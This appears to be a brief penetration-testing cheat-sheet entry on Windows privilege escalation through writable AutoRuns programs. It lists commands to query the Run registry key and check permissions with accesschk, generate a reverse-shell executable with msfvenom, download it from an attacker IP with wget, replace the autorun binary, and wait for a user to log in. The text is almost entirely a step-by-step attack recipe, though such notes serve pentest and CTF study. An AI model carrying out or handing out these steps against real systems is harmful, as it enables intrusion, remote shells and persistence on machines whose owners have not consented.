AutoRuns
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Last updated
.\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"# Create Reverse Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f exe -o program.exe
# Upload to target system
wget http://<Attacker-IP>/program.exe
# Move to binary folder
move .\program.exe "C:\Program Files\Autorun Program\" /Y
# Wait for user to login